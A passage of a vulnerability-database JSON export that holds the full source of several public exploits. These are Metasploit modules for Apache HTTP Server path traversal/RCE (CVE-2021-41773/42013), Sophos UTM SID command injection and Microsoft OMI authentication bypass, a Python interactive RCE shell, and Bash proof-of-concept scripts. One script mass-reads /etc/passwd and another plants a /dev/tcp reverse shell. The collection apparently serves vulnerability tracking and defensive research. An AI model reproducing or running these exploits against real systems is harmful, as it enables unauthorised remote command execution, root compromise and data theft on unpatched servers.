=> { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'DisablePayloadHandler' => 'false' \n} \n} \n], \n[ \n'Unix Command (In-Memory)', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]), \nOptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]), \nOptString.new('TARGETURI', [true, 'Base path', '/cgi-bin']) \n]) 
\nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef execute_command(command, _opts = {}) \ntraversal = pick_payload * datastore['DEPTH'] << '/bin/sh' \n \nuri = normalize_uri(datastore['TARGETURI'], traversal.to_s) \nresponse = send_request_raw({ \n'method' => Rex::Text.rand_text_alpha(3..4), \n'uri' => uri, \n'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\" \n}) \nif response && response.body \nreturn response.body \nend \n \nfalse \nend \n \ndef message(msg) \n\"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\" \nend \n \ndef pick_payload \ncase datastore['CVE'] \nwhen 'CVE-2021-41773' \npayload = '.%2e/' \nwhen 'CVE-2021-42013' \npayload = '.%%32%65/' \nelse \npayload = '' \nend \n \npayload \nend \n \ndef exploit \n@proto = (ssl ? 'https' : 'http') \n \nif (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \n \nprint_status(message(\"Attempt to exploit for #{datastore['CVE']}\")) \ncase target['Type'] \nwhen :linux_dropper \n \nfile_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\" \ncmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\" \n \nprint_status(message(\"Sending #{datastore['PAYLOAD']} command payload\")) \nvprint_status(message(\"Generated command payload: #{cmd}\")) \n \nexecute_command(cmd) \n \nregister_file_for_cleanup file_name \nwhen :unix_command \nvprint_status(message(\"Generated payload: #{payload.encoded}\")) \n \nif !cmd_unix_generic? 
\nexecute_command(payload.encoded) \nelse \nreceived = execute_command(payload.encoded.to_s) \n \nprint_warning(message('Dumping command output in response')) \nif !received \nprint_error(message('Empty response, no command output')) \n \nreturn \nend \nprint_line(received) \nend \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164629/apache_normalize_path_rce.rb.txt"}, {"lastseen": "2021-11-11T17:16:30", "description": "", "cvss3": {}, "published": "2021-11-11T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "PACKETSTORM:164941", "href": "https://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) \n# Date: 11/11/2021 \n# Exploit Author: Valentin Lobstein \n# Vendor Homepage: https://apache.org/ \n# Software Link: https://github.com/Balgogan/CVE-2021-41773 \n# Version: Apache 2.4.49/2.4.50 (CGI enabled) \n# Tested on: Debian GNU/Linux \n# CVE : CVE-2021-41773 / CVE-2021-42013 \n# Credits : Lucas Schnell \n \n \n#!/usr/bin/env python3 \n#coding: utf-8 \n \nimport os \nimport re \nimport sys \nimport time \nimport requests \nfrom colorama import Fore,Style \n \n \nheader = '''\\033[1;91m \n \n\u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n\u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 
\u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n\u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n\u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \n\u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591 \n\u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591 \n\u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL \n \n \nif len(sys.argv) < 2 : \nprint( 'Use: python3 file.py ip:port ' ) 
\nsys.exit() \n \ndef end(): \nprint(\"\\t\\033[1;91m[!] Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \ndef commands(url,command,session): \ndirectory = mute_command(url,'pwd') \nuser = mute_command(url,'whoami') \nhostname = mute_command(url,'hostname') \nadvise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)') \ncommand = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \ncommand = f\"echo; {command};\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nprint(output) \nif 'clear' in command: \nos.system('/usr/bin/clear') \nprint(header) \nif 'exit' in command: \nend() \n \ndef mute_command(url,command): \nsession = requests.Session() \nreq = requests.Request('POST', url=url, data=f\"echo; {command}\") \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \nreturn response.text.strip() \n \n \ndef exploitRCE(payload): \ns = requests.Session() \ntry: \nhost = sys.argv[1] \nif 'http' not in host: \nurl = 'http://'+ host + payload \nelse: \nurl = host + payload \nsession = requests.Session() \ncommand = \"echo; id\" \nreq = requests.Request('POST', url=url, data=command) \nprepare = req.prepare() \nprepare.url = url \nresponse = session.send(prepare, timeout=5) \noutput = response.text \nif \"uid\" in output: \nchoice = \"Y\" \nprint( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host) \nprint(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output ) \nchoice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? 
(Y/n) : \") \nif choice.lower() in ['','y','yes']: \nwhile True: \ncommands(url,command,session) \nelse: \nend() \nelse : \nprint(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host) \nexcept KeyboardInterrupt: \nend() \n \ndef main(): \ntry: \napache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' \napache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' \npayloads = [apache2449_payload,apache2450_payload] \nchoice = len(payloads) + 1 \nprint(header) \nprint(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\") \nwhile choice >= len(payloads) and choice >= 0: \nchoice = int(input('[~] Choice : ')) \nif choice < len(payloads): \nexploitRCE(payloads[choice]) \nexcept KeyboardInterrupt: \nprint(\"\\n\\033[1;91m[!] Bye bye !\") \ntime.sleep(0.5) \nsys.exit(1) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164941/apachehttp2450-exec.txt"}, {"lastseen": "2021-10-28T15:40:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T00:00:00", "type": "packetstorm", "title": "Sophos UTM WebAdmin SID Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2021-10-28T00:00:00", "id": "PACKETSTORM:164697", "href": "https://packetstormsecurity.com/files/164697/Sophos-UTM-WebAdmin-SID-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Sophos UTM WebAdmin SID Command Injection', \n'Description' => %q{ \nThis module exploits an SID-based command injection in Sophos UTM's \nWebAdmin interface to execute shell commands as the root user. 
\n}, \n'Author' => [ \n# Discovered by unknown researcher(s) \n'Justin Kennedy', # Analysis and PoC \n'wvu' # Supplementary analysis and exploit \n], \n'References' => [ \n['CVE', '2020-25223'], \n['URL', 'https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce'], \n['URL', 'https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223'], \n['URL', 'https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a'] \n], \n'DisclosureDate' => '2020-09-18', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 4444, \n'LPORT' => 443, # XXX: Bypass Sophos UTM's egress filtering \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [FIRST_ATTEMPT_FAIL], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef stopwatch \n# https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/ \nstart = Process.clock_gettime(Process::CLOCK_MONOTONIC) \nret = yield \nelapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start \n \n[ret, elapsed] \nend \n \ndef check \nsleep_time = rand(5..10) \n \ninjected, elapsed_time = stopwatch do \ninject_cmd(\"sleep #{sleep_time}\", timeout: sleep_time * 1.5) \nend \n \nreturn CheckCode::Unknown if injected.nil? 
\n \nvprint_status(\"Elapsed time: #{elapsed_time} seconds\") \n \n# injected == false \nunless injected && elapsed_time > sleep_time \nreturn CheckCode::Safe('Failed to test command injection.') \nend \n \n# injected == true \nCheckCode::Appears('Successfully tested command injection.') \nend \n \ndef exploit \nunless datastore['LPORT'] == 443 \nprint_warning('LPORT=443 is recommended to bypass egress filtering') \nend \n \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# nil or true on success \nif inject_cmd(cmd) == false \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \nend \n \ndef inject_cmd(cmd, timeout: 3.5) \nvprint_status(\"Injecting command: #{cmd}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'var'), \n'ctype' => 'application/json; charset=UTF-8', # NOTE: charset is required \n'data' => { \n'SID' => \"|#{cmd}|\" # https://perldoc.perl.org/functions/open#Opening-a-filehandle-into-a-command \n}.to_json \n}, timeout) \n \nreturn unless res \nreturn false unless res.code == 200 && res.body.include?(alert_msg) \n \ntrue \nend \n \ndef alert_msg \n# {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]} \n'Backend connection failed, please click Shift-Reload to try again.' 
\nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/164697/sophos_utm_webadmin_sid_cmd_injection.rb.txt"}, {"lastseen": "2021-10-28T15:41:03", "description": "", "cvss3": {}, "published": "2021-10-28T00:00:00", "type": "packetstorm", "title": "Microsoft OMI Management Interface Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-28T00:00:00", "id": "PACKETSTORM:164694", "href": "https://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nXML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft OMI Management Interface Authentication Bypass', \n'Description' => %q{ \nBy removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint \nthat will cause it to execute an operating system command as the root user. This vulnerability was patched in \nOMI version 1.6.8-1 (released September 8th 2021). 
\n}, \n'Author' => [ \n'Nir Ohfeld', # vulnerability discovery & research \n'Shir Tamari', # vulnerability discovery & research \n'Spencer McIntyre', # metasploit module \n'wvu' # vulnerability research \n], \n'References' => [ \n['CVE', '2021-38647'], \n['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'], \n['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'], \n['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'], \n['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647'] \n], \n'DisclosureDate' => '2021-09-14', \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'unix'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 5985, \n'SSL' => false, \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'AKA' => ['OMIGOD'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/wsman']) \n]) \nend \n \ndef check \nhttp_res = send_command('id') \nreturn CheckCode::Unknown if http_res.nil? \nreturn CheckCode::Safe unless http_res.code == 200 \n \ncmd_res = parse_response(http_res) \nreturn CheckCode::Unknown if cmd_res.nil? 
|| cmd_res[:stdout] !~ /uid=(\\d+)\\(\\S+\\) / \n \nreturn CheckCode::Vulnerable(\"Command executed as uid #{Regexp.last_match(1)}.\") \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nresult = execute_command(payload.encoded) \nif result \nprint_status(result[:stdout]) unless result[:stdout].blank? \nprint_error(result[:stderr]) unless result[:stderr].blank? \nend \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \nres = send_command(cmd) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \n \nparse_response(res) \nend \n \ndef parse_response(res) \nreturn nil unless res&.code == 200 \n \nreturn_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i \nunless return_code == 0 \nprint_error(\"Failed to execute command: #{cmd} (status: #{return_code})\") \nend \n \n{ \nreturn_code: return_code, \nstdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content, \nstderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content \n} \nend \n \ndef send_command(cmd) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'ctype' => 'text/xml;charset=UTF-8', \n'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0) \n<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\" xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\" xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\" xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\" 
xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\"> \n<s:Header> \n<a:To>HTTP://127.0.0.1:5985/wsman/</a:To> \n<w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI> \n<a:ReplyTo> \n<a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address> \n</a:ReplyTo> \n<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action> \n<w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize> \n<a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID> \n<w:OperationTimeout>PT1M30S</w:OperationTimeout> \n<w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/> \n<p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/> \n<w:OptionSet s:mustUnderstand=\"true\"/> \n<w:SelectorSet> \n<w:Selector Name=\"__cimnamespace\">root/scx</w:Selector> \n</w:SelectorSet> \n</s:Header> \n<s:Body> \n<p:ExecuteScript_INPUT xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\"> \n<p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script> \n<p:Arguments/> \n<p:timeout>0</p:timeout> \n<p:b64encoded>true</p:b64encoded> \n</p:ExecuteScript_INPUT> \n</s:Body> \n</s:Envelope> \nENVELOPE \n) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164694/cve_2021_38647_omigod.rb.txt"}, {"lastseen": "2021-10-13T15:48:46", "description": "", "cvss3": {}, "published": "2021-10-13T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Path Traversal / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "PACKETSTORM:164501", "href": "https://packetstormsecurity.com/files/164501/Apache-HTTP-Server-2.4.50-Path-Traversal-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & 
Remote Code Execution (RCE) \n# Date: 10/05/2021 \n# Exploit Author: Lucas Souza https://lsass.io \n# Vendor Homepage: https://apache.org/ \n# Version: 2.4.50 \n# Tested on: 2.4.50 \n# CVE : CVE-2021-42013 \n# Credits: Ash Daulton and the cPanel Security Team \n \n#!/bin/bash \n \nif [[ $1 == '' ]]; [[ $2 == '' ]]; then \necho Set [TAGET-LIST.TXT] [PATH] [COMMAND] \necho ./PoC.sh targets.txt /etc/passwd \necho ./PoC.sh targets.txt /bin/sh id \n \nexit \nfi \nfor host in $(cat $1); do \necho $host \ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done \n \n# PoC.sh targets.txt /etc/passwd \n# PoC.sh targets.txt /bin/sh whoami \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/164501/apache2450-traversalexec.txt"}, {"lastseen": "2021-10-25T17:32:30", "description": "", "cvss3": {}, "published": "2021-10-24T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.50 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-24T00:00:00", "id": "PACKETSTORM:164609", "href": "https://packetstormsecurity.com/files/164609/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html", "sourceData": "`# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) \n# Credits: Ash Daulton & cPanel Security Team \n# Date: 24/07/2021 \n# Exploit Author: TheLastVvV.com \n# Vendor Homepage: https://apache.org/ \n# Version: Apache 2.4.50 with CGI enable \n# Tested on : Debian 5.10.28 \n# CVE : CVE-2021-42013 \n \n#!/bin/bash \n \necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI' \nif [ $# -eq 0 ] \nthen \necho \"try: ./$0 http://ip:port LHOST LPORT\" \nexit 1 \nfi \ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; 
echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\" \n \n#usage chmod -x CVE-2021-42013.sh \n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164609/apache2450-exec.txt"}, {"lastseen": "2021-10-06T17:18:36", "description": "", "cvss3": {}, "published": "2021-10-06T00:00:00", "type": "packetstorm", "title": "Apache HTTP Server 2.4.49 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "PACKETSTORM:164418", "href": "https://packetstormsecurity.com/files/164418/Apache-HTTP-Server-2.4.49-Path-Traversal.html", "sourceData": "`# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal \n# Date: 10/05/2021 \n# Exploit Author: Lucas Souza https://lsass.io \n# Vendor Homepage: https://apache.org/ \n# Version: 2.4.49 \n# Tested on: 2.4.49 \n# CVE : CVE-2021-41773 \n# Credits: Ash Daulton and the cPanel Security Team \n \n#!/bin/bash \n \nif [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then \necho Set [TAGET-LIST.TXT] [PATH] \necho ./PoC.sh targets.txt /etc/passwd \nexit \nfi \nfor host in $(cat $1); do \ncurl --silent --path-as-is --insecure \"$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2\"; done \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/164418/apache2449-traversal.txt"}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. 
If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution (CVE-2021-42013). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T19:12:12", "type": "mageia", "title": "Updated apache packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T19:12:12", "id": "MGASA-2021-0470", "href": "https://advisories.mageia.org/MGASA-2021-0470.html", "cvss": {"score": 7.5, "vector": 